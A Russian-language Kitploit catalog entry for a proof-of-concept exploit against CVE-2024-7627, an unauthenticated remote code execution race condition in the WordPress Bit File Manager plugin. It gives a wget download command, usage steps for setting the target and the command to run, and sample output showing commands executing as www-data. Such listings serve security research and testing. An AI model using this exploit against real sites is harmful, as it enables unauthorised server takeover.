Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7627-PoC — Скрипт Proof-of-Concept для плагина WordPress Bit File Manager версий 6.0 – 6.5.5, эксплуатирующий уязвимость неаутентифицированного удалённого выполнения кода через состояние гонки (CVE-2024-7627) | Kitploit
Инструменты/GitHubGitHub/siunam321/cve-2024-7627-poc
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsiunam321/cve-2024-7627-poc

CVE-2024-7627-PoC

Скрипт Proof-of-Concept для плагина WordPress Bit File Manager версий 6.0 – 6.5.5, эксплуатирующий уязвимость неаутентифицированного удалённого выполнения кода через состояние гонки (CVE-2024-7627)

Репозиторий
621 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-7627-PoC

Общие сведения

Этот Proof-of-Concept (PoC) скрипт предназначен для эксплуатации уязвимости неаутентифицированного удалённого выполнения кода через состояние гонки (CVE-2024-7627) в плагине Bit File Manager для WordPress версий 6.0 - 6.5.5.

Информация

Описание:

Плагин Bit File Manager для WordPress уязвим к удалённому выполнению кода в версиях с 6.0 по 6.5.5 через функцию 'checkSyntax'. Это связано с записью временного файла в общедоступный каталог перед выполнением проверки файла. Это позволяет неаутентифицированным злоумышленникам выполнять код на сервере, если администратор разрешил гостевому пользователю права на чтение. (Источник: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)

Технические детали

Разбор: https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition

Установка

root@kitploit:~
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py

Использование/Эксплуатация

  • Предварительное условие: доступ гостевого пользователя и шорткод file-manager должны быть уже настроены администратором.

Обновите значения targetBaseUrl, fileManagerPostPath и/или commandToExecute в Python-скрипте poc.py на желаемые. Затем выполните python3 poc.py, чтобы запустить PoC-скрипт.

Пример вывода:

root@kitploit:~
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6
Скачать инструмент